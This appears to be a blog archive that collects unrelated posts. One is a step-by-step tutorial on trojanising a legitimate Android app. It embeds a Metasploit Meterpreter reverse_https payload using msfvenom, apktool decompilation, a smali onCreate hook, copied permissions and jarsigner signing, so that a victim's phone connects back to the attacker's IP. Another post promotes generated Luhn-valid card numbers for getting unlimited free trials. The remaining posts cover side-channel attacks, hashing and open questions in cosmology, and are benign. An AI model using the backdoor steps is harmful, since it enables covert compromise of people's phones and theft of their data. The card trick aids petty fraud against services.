Wednesday, December 26, 2018

Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to "not get charged." Then I end up forgetting about the trial and want to kick myself in the ass when I see my statement at the end of the month.

In order to avoid that rigmarole, you can actually use fake credit numbers instead of your own, and you can do that using the site getcreditcardnumbers.com, which can generate up to 9,999 credit card numbers at a time, or just one.

Now, to be completely clear, these numbers cannot be used to purchase any item. Nada. Zilch. Nothing. For that to work, you would need a valid expiration date and CVV or CSV number. This site merely provides the standard 16 digit credit card number that can be used to bypass certain online forms that only ask for the number.

How Does It Work?
The credit card number generator uses a system based off of the Luhn Algorithm, which has been used to validate numbers for decades. You can learn more about the algorithm on their webpage, or check out the Null Byte guide on how credit card algorithms work. A fake number will work for sites that store credit card information to either charge you later or ask you to upgrade.

For sites that ask for an upfront fee or have an automatic charge sometime down the line (Hulu Plus, Netflix, Spotify), this won't work since they ask for more than just a credit card number for validation. You can, however, get unlimited free trials on those sites using a simple trick with your email address if you have a valid card number with expiration date and CSV.

Getting a Card Number on Android
There's also an Android application for getting fake card numbers called CardGen, available for free in the Play Store. You can generate and validate credit card numbers directly from the app, making it easy to use on the go as well. Validation in particular would be useful if you were accepting credit card payments on your own site and wanted to make sure the cards were legit.




The app is ad-supported, but since it's free, I can live with that. In the generate field you can select from most of the major credit card providers, including American Express, Mastercard, Visa, and Discover. The disclaimer explains what the app does and how you should use it.


What would you do with these credit card number generators? Let us know in the comments section.



Embed a Metasploit Payload in an Original .apk File

Metasploit's flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system.

The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones also. But if you have tried out these payloads you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app in their phone?

One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original one, so the victim won't even know that his system is compromised. That's what we are going to do in this tutorial.

NOTE – This is a follow-up post of my previous post, in which I showed you how to do this using a very simple yet effective Ruby script. If you haven't read it, check it out. If you are not willing to go down the hard path, you can use that method to do it just fine. But if you want to know the inner workings and have a greater knowledge, continue reading this post. And also, In the following Android Hacking tutorials, I may refer to this tutorial, so If you can take it, I suggest you to keep on reading.

PRE-REQUESTS:

This tutorial is based on the Kali Linux Operating System. I'm sure it can be done in other OS, especially Linux Distros, but that will involve some more complications so I'm not going to cover those. If you are serious about Hacking or Penetration Testing, if you prefer, you should use Kali as it was built specifically for Pen-Testing.

We will also need some libraries and tools in the following steps, so I think it's better if you install them right now.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1_

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.

Also download the apk which you want to be backdoor-ed from any source you like. Just do a google search "app_name apk download" and Google will come up with a lot of results. Save that apk in the root folder.

BRIEF OVERVIEW:
Since this tutorial is a little bit long, I'm giving a brief overview of what we are going to do here.

1.Generate the Meterpreter payload
2.Decompile the payload and the original apk
3.Copy the payload files to the original apk
4.Inject the hook into the appropriate activity of the original apk
5.Inject the permissions in the AndroidManifest.xml file
6.Re-compile the original apk
7.Sign the apk using Jarsigner

That's about it. I will also show you how can you get a working Meterpreter session using that backdoored apk, if you don't know that already. So let's get started.

Step 1: GENERATE the PAYLOAD:

First of all, we have to make the Meterpreter payload. We are going to use MSFVenom for this. The command is-

msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk

Replace Payload_Type by any of the following payloads available. The function of all these payloads are same, essentially they are all Meterpreter payloads, the difference is only in the method they use to connect to your Kali system. The available Payload_Types are –

1.reversetcp
2.reverse_http
3.reverse_https

You can use any one you like, I'm going to use reverse_https as an example.

Replace IP_Address by the IP address to which the payload is going to connect back to, i.e the IP address of the attacker's system. If you are going to perform this attack over a local network (eg. if the victim and attacker are connected to the same WiFi hotspot), your Local IP will suffice. To know what your local IP is, run the command – ifconfig 






If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet. To know your public IP, just google "My IP" and Google will help you out.

Replace Incoming_Port with the port no. which you want to be used by the payload to connect to your system. This can be any valid port except the reserved ones like port 80 (HTTP). I'm going to use 4895 as an example.


So run the command using replacing the keywords with appropriate values and MSFVenom will generate a payload "meterpreter.apk" in the root directory. Note that we specified the output file name using the "-o meterpreter.apk" argument in the command, so if you like, you can name it anything else also.



Step 2: DECOMPILE the APKs:

Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the code to a fairly human-readable format and saves it in .smali files, and also successfully extracts the .xml files. Assuming you have already installed the latest apktool and also have the original apk file in the root directory, run the following commands –

apktool d -f -o payload /root/meterpreter.apk

apktool d -f -o original /root/Original_APK_Name

It will decompile the payload to "/root/payload" and the original apk to "/root/original" directory.


Step 3: COPY the PAYLOAD FILES:

Now we have to copy the payload files to the original app's folder. Just go to "/root/payload/smali/com/metasploit/stage" and copy all the .smali files whose file name contains the word 'payload'. Now paste them in "/root/original/smali/com/metasploit/stage". Note that this folder does not exists, so you have to create it.

Step 4: INJECT the HOOK in the ORIGINAL .SMALI CODE:

In the previous step, we just copied the payload codes inside the original apk, so that when the original apk is recompiled, it will contain the payload. But that doesn't necessarily mean that the payload will run. To ensure that the payload runs, we have to inject a hook in the original apk's .smali code. If you are wondering what is this hook thingy I'm talking about, well essentially it's a code which intercepts some specific function call and reacts to it. In this case, we are going to place the hook so that when the app is launched, it will also launch the payload with it.

For this, firstly we have to find out which activity to put it simply, activities are sections of code, it's similar to frames in windows programming is run when the app is launched. We can get this info from the AndroidManifest.xml file.

So open up the AndroidManifest.xml file located inside the "/root/original" folder using any text editor. If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure e.g. <tag attribute="value"> Content </tag>. Anyway, look for an <activity> tag which contains both the lines –

_<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>_

On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its "android:name" attribute's value. In my case, as you can see from the screenshot below, it is "com.piriform.ccleaner.ui.activity.MainActivity".


Those two lines we searched for signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity similar to the 'main' function in traditional programming.

Now that we have the name of the activity we want to inject the hook into, let's get to it! First of all, open the .smali code of that activity using gedit. Just open a terminal and type –

gedit /root/original/smali/Activity_Path

Replace the Activity_Path with the activity's "android:name", but instead of the dots, type slash. Actually the smali codes are stored in folders named in the format the "android:name" is in, so we can easily get the location of the .smali code in the way we did. Check the screenshot below and you will get an idea of what I'm trying to say.


Now search for the following line in the smali code using CTRL+F –

;->onCreate(Landroid/os/Bundle;)V

When you locate it, paste the following code in the line next to it –

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

What we are doing here is, inserting a code which starts the payload alongside the existing code which is executed when the activity starts. Now, save the edited smali file.

Step 5: INJECT the NECESSARY PERMISSIONS:

From developer.android.com –

Additional finer-grained security features are provided through a "permission" mechanism that enforces restrictions on the specific operations that a particular process can perform.

If we do not mention all the additional permissions that our payload is going to need, it cannot function properly. While installing an app, these permissions are shown to the user. But most of the users don't care to read all those boring texts, so we do not have to worry about that much.

These permissions are also listed in the previously encountered AndroidManifest file. So let's open the AndroidManifest.xml of both the original app and the payload from the respective folders. The permissions are mentioned inside <uses-permission> tag as an attribute 'android:name'. Copy the additional permission lines from the Payload's AndroidManifest to the original app's one. But be careful that there should not be any duplicate.

Here's my original app's AndroidManifest before editing –


After adding the additional ones from the Payload's AndroidManifest, my /root/original/AndroidManifest.xml looks like this –


Step 6: RECOMPILE the ORIGINAL APK:

Now th hard parts are all done! We just have to recompile the backdoored app into an installable apk. Run the following command –

apktool b /root/original


You will now have the compiled apk inside the "/root/original/dist" directory. But, we're still not done yet.

Step 7: SIGN the APK:

This is also a very important step, as in most of the cases, an unsigned apk cannot be installed. From developer.android.com –

Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate's private key.

In this case we are going to sign the apk using the default android debug key. Just run the following command –

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

Be sure to replace the apk_path in the above command with the path to your backdoored apk file.


PROFIT?!:

Now if you can get the victim to install and run this very legit-looking app in his phone, you can get a working meterpreter session on his phone!


If you face any difficulty, please let me know in the comments. Thanks for reading!


Monday, August 6, 2018

Side-channel attacks


What is a side-channel attack?

A side-channel attack is a form of reverse engineering. Electronic circuits are inherently leaky – they produce emissions as byproducts that make it possible for an attacker without acess to the circuitry itself to deduce how the circuit works and what data it is processing. Heat and electromagnetic emissions are both viable sources of information for an attacker. Because these emissions do not play a part in the operation of the circuit itself – they are simply side effects of it working – the use of them to perform reverse engineering has earned the term 'side-channel analysis' or 'side-channel attack'. The difference between the two is largely one of intention.

How realistic is the risk?

The risk is, at the very least, costly to reputation. A number of security researchers actively use side-channel analysis to determine the vulnerability of commercial ICs. They will often pick as primary targets products that are sold as possessing high security, able to protect sensitive information or financial value, in order to demonstrate that they have unforeseen vulnerabilites. A recent example is the analysis of a Microsemi field-programmable gate array (FPGA) by researchers at the University of Cambridge, UK and private company Quo Vadis Labs. The researchers claimed their analysis demonstrated the existence of a backdoor to the FPGA's stored content. Microsemi denied that this was the case arguing that the researchers had simply analysed a test function that could be disabled permanently by customers before deployment.

The year before, researchers at the Horst Hortz Institute for IT Security at Ruhr University in Bochum, Germany described how they cracked the AES-256 encryption that designers can use to protect the circuits downloaded into Xilinx's Virtex-4 and Virtex-5 FPGAs.

There is even an annual competition to determine who can crack a programmable logic-based AES implementation the fastest using side-channel analysis. The organizers claim the purpose is to help improve countermeasures to attacks on cryptographic functions.

Aside from the reputational risks to silicon vendors, there are risks to users of secure devices as attackers may use side-channel analysis reconstruct encryption keys and attack the system for financial gain or to gain access to secret data.

How does side-channel analysis work?

All attacks take advantage of the changes in processing behavior that will be exhibited at different times during algorithm execution. There are two broad classes of side-channel analysis: simple and differential. Within those classes, attackers can use a range of side-channel properties, such as heat generated, power consumed, or execution time. For embedded systems where the attacker has access to the hardware, heat and power represent the most important sources of leaks, although timing-based attacks are likely to become more on multitasking and multiprocessor systems where the attacker is able to load their own code or use interactions between existing applications to track behavior.

For networked systems, time-based attacks are the most feasible and have been exploited. Systems that use memory caches are particularly vulnerable to timing-based attacks because of the significant difference in performance of a given section of code based on whether accesses to the cache hit or miss and force a slower read or write to main memory.

If an attacker is able to run their own code on the system, they can exploit timing-based attacks not just by observing the runtime of the target application but the timing of memory accesses of their own, as these will be affected by cache behavior. This can even be achieved on cloud servers. The attacker can force the cache into a particular state by running software that fills the lines in a predetermined way and also observe how the target application displaces their own data.

The group led by G Edward Suh at Cornell University has identified network-on-chip (NoC) and shared-memory controllers as vulnerable to timing-related side-channel attacks.

Similar to systems with caches, low end microcontrollers without dedicated encryption circuitry often take varying lengths of time to perform the computations needed to encrypt or decrypt data. Commonly used encryption systems employ a mixture of exponentiation – typically squaring – and multiplication, proceeding one bit at a time. As squaring can be achieved on a binary system using just shift operations, it takes many fewer cycles than the shift-and-add serial multiplication algorithm that will be used by low-end microcontrollers – so the attacker can look at the time it takes to process each instruction. If the microcontroller has a dedicated multiplier, this will consume more energy than the squaring operation, consuming more current and generating more heat and EMI.

In an algorithm such as RSA decryption, a multiplication will only be performed if the exponent bit being processed is 1. The attacker can simply measure changes in current to derive the key, one bit at a time.

Simple power analysis works for low integration ICs where there is little other on-chip activity to mask the behaviour of the target circuit. For this reason, simple power analysis is not generally very useful, although it has served to uncover the encryption keys processed by low-end microcontrollers.

Differential power analysis (DPA) is a statistical method that has proved devastatingly effective at uncovering sensitive information about target circuits even when other surrounding gates are actively switching. DPA involves the attacker making an hypothesis about the behaviour or state of the target circuit – a guess at part of a full encryption key, for example, on the basis that most systems work on keys in a series of, say, 8bit chunks.

If the guess is correct, the emissions associated with the electrical activity inside the chip will be correlated. If not, the actiivty will be uncorrelated. Over a large number of guesses and measurements, the correlated results will separate out, providing the attacker with clues as to the key value. As more measurements are taken, the more any uncorrelated noise is reduced.

The attack on the Microsemi ProASIC3 FPGAs involved a variant of DPA called pipeline emission analysis, developed by the sponsor of the research, Quo Vadis Labs.



Are there countermeasures?

A range of countermeasures can be used to defeat, or at least slow down, side-channel analysis. They concentrate mainly on the reduction of differences between leakage values – in which the operation sequences are made less dependent on key values or intermediates – and randomisation, where the order of operations on the data is constantly changing. This latter technique is generatlly better at defeating the correlation techniques used in DPA as leakage mitigation can be overcome through the use of more measurements.

The techniques used for leakage mitigation include pre-charging registers and buses to prevent the generation of power-leakage signatures based on the change in bus values as data values are passed. Fixed‐time algorithms that have no no data‐dependent delays can reduce the ability to detect data‐related timing signatures. Performing more operations in parallel or even dummy operations will also reduce the attacker’s effective signal‐to‐noise ratio.

Companies such as Cryptography Research (CRI) have patented side-channel countermeasures that can be licensed by OEMs. Others, such as ESCRYPT have developed IP cores that they claim to be far more resistant to side-channel analysis than conventional designs.

At the 22nd Usenix Security Symposium in 2013, researchers from the IMDEA Software Institute and Saarland University presented an auditing tool – CacheAudit – for caches to demonstrate how effectively countermeasures such as preloading could mitigate cache-oriented timing-based attacks.

Boris Köpf and colleagues from IMDEA have also developed techniques to quantify the upper bounds on the amount of information that may be leaked by a particular cache implementation for a given program using the AbsInt Timing Explorer tool.

In general, the team has observed that larger caches increase information leakage because it improves the resolution of data that the attacker can obtain. Conversely, longer line sizes reduce leakage.

Friday, July 27, 2018

What is a Hash Function?

A cryptographic hash function is a hash function which takes an input (or ‘message’) and returns a fixed-size alphanumeric string. The string is called the ‘hash value’, ‘message digest’, ‘digital fingerprint’, ‘digest’ or ‘checksum’.

Above diagram explains hashing, we have our text “abc123” and after applying a hash function(SHA-1) we get fixed-size alphanumeric output which we called as a hash value. By using this hash value we cannot get back our original input text.

Fundamentals of Hashing
Hash functions are one-way: we cannot reverse a hash value to find the original content. (irreversible)
If we pass the same content through the same hash function then it should produce the same output/same hash value.
Imagine a scenario of storing passwords in software systems…

If we store passwords in plain text anyone who has access to the database can view all passwords and even can log in to the system using someone’s credentials. To overcome this we can use hashing.

Instead of saving plain text password, we can hash the password using hashing function(h1) and store the hash value.

When a user tries to log in to the system, users input password is hashed using the same hash function(h1) and check it with the hash value stored in the table. If both hash values are equal we can allow the user to log in to the system.

In the above table john and sam has the same password “abc123” and after applying hash function both of them get the same hash value. Imagine john has access to the database and he can view the hash password. Then john can notice that his password hash value and sam’s password hash value are the same. So john will be able to login to the system using sam’s credentials. To overcome this we can apply the technique called salting.

Salted Hashing
In salted hashing, our goal is to make the hash value of the password unique, for that system generates a random set of characters called salt. When user enters plain text password, the generated random set of characters will be append to the plain text password. Then we sent the appended text to hashing function and get the hash value(salted hash). In this case, we have to store salt value for each user.

In the above table even though john and sam have the same password, hash value is different.

In the login process system gets salt value for the relevant user from the database and append it with input password and pass it through the hashing function and check the resulting hash value with the stored hash value in the table. If both hash values match, the user is authenticated.

Hash Collision
If two different inputs are having the same hash value, it is called a collision. Since hash functions have infinite input length and a predefined output length, there is a possibility of two different inputs that produce same hash value.

Here is an example that displays different content, yet has the same SHA-1 value. A team of researchers from CWI (Centrum Wiskunde & Informatica) and Google have managed to alter a PDF without changing its SHA-1 hash value.

http://shattered.io/

SHA-512 produces hashes that are longer than those produced by MD5, so it’s harder to find collision opportunities.

See the difference for yourself:

input text : “password”

MD5:
5f4dcc3b5aa765d61d8327deb882cf99
SHA-1:
5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
SHA-256:  5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
SHA-512:  b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86

Applications of Hashing
For password storage and authentication.
We have discussed this scenario above.

Integrity Protection.


Bob wants to send a message to Alice, but there is this middle man Darth who can modify the message from Bob to Alice. So, how can Alice verify that she receives the original message sent by Bob and it is not modified by someone during the communication?

What Bob can do is, after writing the message he can calculate the hash value of the message and send it along with the message. When Alice receives the message, she can again calculate the hash value for the message from the same hashing function used by Bob and check it with the hash value she received from Bob. If both hash values are equal Alice can verify that the message is not modified.

SSL Certificate Validation
HTTPS is reflected in the browser’s URL bar to indicate a secure connection while accessing secure websites. In SSL/TLS handshake process when client says hello, server sends its public key along with a certificate that asserts public key belongs to the server. If it’s a website(google.com) the certificate will contain domain name of the website. Basically certificate says something like public key(which sent along with the certificate) belongs to google.com. So, how do you check the validity of this certificate, that’s where hashing comes into play.

Here is the certificate of google.com. You can see the hash value of google.com certificate under Fingerprints section.


What basically happen is, your browser downloads the web server’s certificate, calculate the hash value of certificate itself then compare it with the hash value in the certificate. If both of these hash values are equal certificate is verified.

Thursday, May 10, 2018

Secrets of Existence



Question 1 : What is dark matter?

All the ordinary matter we can find accounts for only about 4 percent of the universe. We know this by calculating how much mass would be needed to hold galaxies together and cause them to move about the way they do when they gather in large clusters. Another way to weigh the unseen matter is to look at how gravity bends the light from distant objects. Every measure tells astronomers that most of the universe is invisible. 

It's tempting to say that the universe must be full of dark clouds of dust or dead stars and be done with it, but there are persuasive arguments that this is not the case. First, although there are ways to spot even the darkest forms of matter, almost every attempt to find missing clouds and stars has failed. Second, and more convincing, cosmologists can make very precise calculations of the nuclear reactions that occurred right after the Big Bang and compare the expected results with the actual composition of the universe. Those calculations show that the total amount of ordinary matter, composed of familiar protons and neutrons, is much less than the total mass of the universe. Whatever the rest is, it isn't like the stuff of which we're made. 

The quest to find the missing universe is one of the key efforts that has brought cosmologists and particle physicists together. The leading dark-matter candidates are neutrinos or two other kinds of particles: neutralinos and axions, predicted by some physics theories but never detected. All three of these particles are thought to be electrically neutral, thus unable to absorb or reflect light, yet stable enough to have survived from the earliest moments after the Big Bang. 


Question 2 : What is dark energy?

Two recent discoveries from cosmology prove that ordinary matter and dark matter are still not enough to explain the structure of the universe. There's a third component out there, and it's not matter but some form of dark energy.

The first line of evidence for this mystery component comes from measurements of the geometry of the universe. Einstein theorized that all matter alters the shape of space and time around it. Therefore, the overall shape of the universe is governed by the total mass and energy within it. Recent studies of radiation left over from the Big Bang show that the universe has the simplest shape—it's flat. That, in turn, reveals the total mass density of the universe. But after adding up all the potential sources of dark matter and ordinary matter, astronomers still come up two-thirds short. 

The second line of evidence suggests that the mystery component must be energy. Observations of distant supernovas show that the rate of expansion of the universe isn't slowing as scientists had once assumed; in fact, the pace of the expansion is increasing. This cosmic acceleration is difficult to explain unless a pervasive repulsive force constantly pushes outward on the fabric of space and time. 

Why dark energy produces a repulsive force field is a bit complicated. Quantum theory says virtual particles can pop into existence for the briefest of moments before returning to nothingness. That means the vacuum of space is not a true void. Rather, space is filled with low-grade energy created when virtual particles and their antimatter partners momentarily pop into and out of existence, leaving behind a very small field called vacuum energy. 

That energy should produce a kind of negative pressure, or repulsion, thereby explaining why the universe's expansion is accelerating. Consider a simple analogy: If you pull back on a sealed plunger in an empty, airtight vessel, you'll create a near vacuum. At first, the plunger will offer little resistance, but the farther you pull, the greater the vacuum and the more the plunger will pull back against you. Although vacuum energy in outer space was pumped into it by the weird rules of quantum mechanics, not by someone pulling on a plunger, this example illustrates how repulsion can be created by a negative pressure. 


Question 3 : How were the heavy elements from iron to uranium made?

Both dark matter and possibly dark energy originate from the earliest days of the universe, when light elements such as helium and lithium arose. Heavier elements formed later inside stars, where nuclear reactions jammed protons and neutrons together to make new atomic nuclei. For instance, four hydrogen nuclei (one proton each) fuse through a series of reactions into a helium nucleus (two protons and two neutrons). That's what happens in our sun, and it produces the energy that warms Earth. 

But when fusion creates elements that are heavier than iron, it requires an excess of neutrons. Therefore, astronomers assume that heavier atoms are minted in supernova explosions, where there is a ready supply of neutrons, although the specifics of how this happens are unknown. More recently, some scientists have speculated that at least some of the heaviest elements, such as gold and lead, are formed in even more powerful blasts that occur when two neutron stars—tiny, burned-out stellar corpses—collide and collapse into a black hole.


Question 4 : Do neutrinos have mass?

Nuclear reactions such as those that create heavy elements also create vast numbers of ghostly subatomic bits known as neutrinos. These belong to a group of particles called leptons, such as the familiar electron and the muon and tau particles. Because neutrinos barely interact with ordinary matter, they can allow a direct look into the heart of a star. This works only if we are able to capture and study them, something physicists are just now learning to do. 

Not long ago, physicists thought neutrinos were massless, but recent advances indicate that these particles may have a small mass. Any such evidence would also help validate theories that seek to find a common description of three of the four natural forces—electromagnetism, strong force, and weak force. Even a tiny bit of heft would add up because a staggering number of neutrinos are left over from the Big Bang. 


Question 5 : Where do ultrahigh-energy particles come from?

The most energetic particles that strike us from space, which include neutrinos as well as gamma-ray photons and various other bits of subatomic shrapnel, are called cosmic rays. They bombard Earth all the time; a few are zipping through you as you read this article. Cosmic rays are sometimes so energetic, they must be born in cosmic accelerators fueled by cataclysms of staggering proportions. Scientists suspect some sources: the Big Bang itself, shock waves from supernovas collapsing into black holes, and matter accelerated as it is sucked into massive black holes at the centers of galaxies. Knowing where these particles originate and how they attain such colossal energies will help us understand how these violent objects operate.


Question 6 : Is a new theory of light and matter needed to explain what happens at very high energies and temperatures?
All of that violence cited in question 5 leaves a visible trail of radiation, especially in the form of gamma rays—the extremely energetic cousins of ordinary light. Astronomers have known for three decades that brilliant flashes of these rays, called gamma-ray bursts, arrive daily from random directions in the sky. Recently astronomers have pinned down the location of the bursts and tentatively identified them as massive supernova explosions and neutron stars colliding both with themselves and black holes. But even now nobody knows much about what goes on when so much energy is flying around. Matter grows so hot that it interacts with radiation in unfamiliar ways, and photons of radiation can crash into each other and create new matter. The distinction between matter and energy grows blurry. Throw in the added factor of magnetism, and physicists can make only rough guesses about what happens in these hellish settings. Perhaps current theories simply aren't adequate to explain them.


Question 7 : Are there new states of matter at ultrahigh temperatures and densities?

Under extreme energetic conditions, matter undergoes a series of transitions, and atoms break down into their smallest constituent parts. Those parts are elementary particles called quarks and leptons, which as far as we know cannot be subdivided into smaller parts. Quarks are extremely sociable and are never observed in nature alone. Rather, they combine with other quarks to form protons and neutrons (three quarks per proton) that further combine with leptons (such as electrons) to form whole atoms. The hydrogen atom, for example, is made up of an electron orbiting a single proton. Atoms, in turn, bind to other atoms to form molecules, such as H2O. As temperatures increase, molecules transform from a solid such as ice, to a liquid such as water, to a gas such as steam. 

That's all predictable, known science, but at temperatures and densities billions of times greater than those on Earth, it's possible that the elementary parts of atoms may come completely unglued from one another, forming a plasma of quarks and the energy that binds quarks together. Physicists are trying to create this state of matter, a quark-gluon plasma, at a particle collider on Long Island. At still higher temperatures and pressures, far beyond those scientists can create in a laboratory, the plasma may transmute into a new form of matter or energy. Such phase transitions may reveal new forces of nature. 

These new forces would be added to the three forces that are already known to regulate the behavior of quarks. The so-called strong force is the primary agent that binds these particles together. The second atomic force, called the weak force, can transform one type of quark into another (there are six different "flavors" of quark—up, down, charm, strange, top, and bottom). The final atomic force, electromagnetism, binds electrically charged particles such as protons and electrons together. As its name implies, the strong force is by far the most muscular of the three, more than 100 times as powerful as electromagnetism and 10,000 times stronger than the weak force. Particle physicists suspect the three forces are different manifestations of a single energy field in much the same way that electricity and magnetism are different facets of an electromagnetic field. In fact, physicists have already shown the underlying unity between electromagnetism and the weak force. 

Some unified field theories suggest that in the ultrahot primordial universe just after the Big Bang, the strong, weak, electromagnetic, and other forces were one, then unraveled as the cosmos expanded and cooled. The possibility that a unification of forces occurred in the newborn universe is a prime reason particle physicists are taking such a keen interest in astronomy and why astronomers are turning to particle physics for clues about how these forces may have played a role in the birth of the universe. For unification of forces to occur, there must be a new class of supermassive particles called gauge bosons. If they exist, they will allow quarks to change into other particles, causing the protons that lie at the heart of every atom to decay. And if physicists prove protons can decay, the finding will verify the existence of new forces. 

That raises the next question.


Question 8 : Are protons unstable?
In case you're worried that the protons you're made of will disintegrate, transforming you into a puddle of elementary particles and free energy, don't sweat it. Various observations and experiments show that protons must be stable for at least a billion trillion trillion years. However, many physicists believe that if the three atomic forces are really just different manifestations of a single unified field, the alchemical, supermassive bosons described above will materialize out of quarks every now and then, causing quarks, and the protons they compose, to degenerate. 

At first glance, you'd be forgiven for thinking these physicists had experienced some sort of mental decay on the grounds that tiny quarks are unlikely to give birth to behemoth bosons weighing more than 10,000,000,000,000,000 times themselves. But there's something called the Heisenberg uncertainty principle, which states that you can never know both the momentum and the position of a particle at the same time, and it indirectly allows for such an outrageous proposition. Therefore, it's possible for a massive boson to pop out of a quark making up a proton for a very short time and cause that proton to decay. 


Question 9 : What is gravity?

Next there's the matter of gravity, the odd force out when it comes to small particles and the energy that holds them together. When Einstein improved on Newton's theory, he extended the concept of gravity by taking into account both extremely large gravitational fields and objects moving at velocities close to the speed of light. These extensions lead to the famous concepts of relativity and space-time. But Einstein's theories do not pay any attention to quantum mechanics, the realm of the extremely small, because gravitational forces are negligible at small scales, and discrete packets of gravity, unlike discrete packets of energy that hold atoms together, have never been experimentally observed. 

Nonetheless, there are extreme conditions in nature in which gravity is compelled to get up close and personal with the small stuff. For example, near the heart of a black hole, where huge amounts of matter are squeezed into quantum spaces, gravitational forces become very powerful at tiny distances. The same must have been true in the dense primordial universe around the time of the Big Bang. 

Physicist Stephen Hawking identified a specific problem about black holes that requires a bridging of quantum mechanics and gravity before we can have a unified theory of anything. According to Hawking, the assertion that nothing, even light, can escape from a black hole is not strictly true. Weak thermal energy does radiate from around black holes. Hawking theorized that this energy is born when particle-antiparticle pairs materialize from the vacuum in the vicinity of a black hole. Before the matter-antimatter particles can recombine and annihilate each other, one that may be slightly closer to the black hole will be sucked in, while the other that is slightly farther away escapes as heat. This release does not connect in any obvious way to the states of matter and energy that were earlier sucked into that black hole and therefore violates a law of quantum physics stipulating that all events must be traceable to previous events. New theories may be needed to explain this problem. 


Question 10 : Are there additional dimensions?

Wondering about the real nature of gravity leads eventually to wondering whether there are more than the four dimensions we can easily observe. To get to that place, we might first wonder if nature is, in fact, schizophrenic: Should we accept that there are two kinds of forces that operate over two different scales—gravity for big scales like galaxies, the other three forces for the tiny world of atoms? Poppycock, say unified theory proponents—there must be a way to connect the three atomic-scale forces with gravity. Maybe, but it won't be easy. In the first place, gravity is odd. Einstein's general theory of relativity says gravity isn't so much a force as it is an inherent property of space and time. Accordingly, Earth orbits the sun not because it is attracted by gravity but because it has been caught in a big dimple in space-time caused by the sun and spins around inside this dimple like a fast-moving marble caught in a large bowl. Second, gravity, as far as we have been able to detect, is a continuous phenomenon, whereas all the other forces of nature come in discrete packets.

All this leads us to the string theorists and their explanation for gravity, which includes other dimensions. The original string-theory model of the universe combines gravity with the other three forces in a complex 11-dimensional world. In that world—our world—seven of the dimensions are wrapped up on themselves in unimaginably small regions that escape our notice. One way to get your mind around these extra dimensions is to visualize a single strand of a spiderweb. To the naked eye, the filament appears to be one dimensional, but at high magnification it resolves into an object with considerable width, breadth, and depth. String theorists argue that we can't see extra dimensions because we lack instruments powerful enough to resolve them. 

We may never see these extra dimensions directly, but we may be able to detect evidence of their existence with the instruments of astronomers and particle physicists. 


Question 11 : How did the universe begin?

If all four forces of nature are really a single force that takes on different complexions at temperatures below several million degrees, then the unimaginably hot and dense universe that existed at the Big Bang must have been a place where distinctions between gravity, strong force, particles, and antiparticles had no meaning. Einstein's theories of matter and space-time, which depend upon more familiar benchmarks, cannot explain what caused the hot primordial pinpoint of the universe to inflate into the universe we see today. We don't even know why the universe is full of matter. According to current physics ideas, energy in the early universe should have produced an equal mix of matter and antimatter, which would later annihilate each other. Some mysterious and very helpful mechanism tipped the scales in favor of matter, leaving enough to produce galaxies full of stars.

Fortunately, the primordial universe left behind a few clues. One is the cosmic microwave background radiation, the afterglow of the Big Bang. For several decades now, that weak radiation measured the same wherever astronomers looked at the edges of the universe. Astronomers believed such uniformity meant that the Big Bang commenced with an inflation of space-time that unfolded faster than the speed of light. 

More recent careful observation, however, shows that the cosmic background radiation is not perfectly uniform. There are minuscule variations from one small patch of space to another that are randomly distributed. Could random quantum fluctuations in the density of the early universe have left this fingerprint? Very possibly, says Michael Turner, chairman of the astrophysics department at the University of Chicago and chairman of the committee that came up with these 11 questions. Turner and many other cosmologists now believe the lumps of the universe—vast stretches of void punctuated by galaxies and galactic clusters—are probably vastly magnified versions of quantum fluctuations of the original, subatomic-size universe. 

And that is just the sort of marriage of the infinite and the infinitesimal that has particle physicists cozying up to astronomers these days, and why all 11 of these mysteries might soon be explained by one idea. 



Real Question : How Did We Get Here?


Astronomers cannot see all the way back in time to the origin of the universe, but by drawing on lots of clues and theory, they can imagine how everything began. 

Their model starts with the entire universe as a very hot dot, much smaller than the diameter of an atom. The dot began to expand faster than the speed of light, an expansion called the Big Bang. Cosmologists are still arguing about the exact mechanism that may have set this event in motion. From there on out, however, they are in remarkable agreement about what happened. As the baby universe expanded, it cooled the various forms of matter and antimatter it contained, such as quarks and leptons, along with their antimatter twins, antiquarks and antileptons. These particles promptly smashed into and annihilated one another, leaving behind a small residue of matter and a lot of energy. The universe continued to cool down until the few quarks that survived could latch together into protons and neutrons, which in turn formed the nuclei of hydrogen, helium, deuterium, and lithium. For 300,000 years, this soup stayed too hot for electrons to bind to the nuclei and form complete atoms. But once temperatures dropped enough, the same hydrogen, helium, deuterium, and lithium atoms that are around today formed, ready to start a long journey into becoming dust, planets, stars, galaxies, and lawyers. 

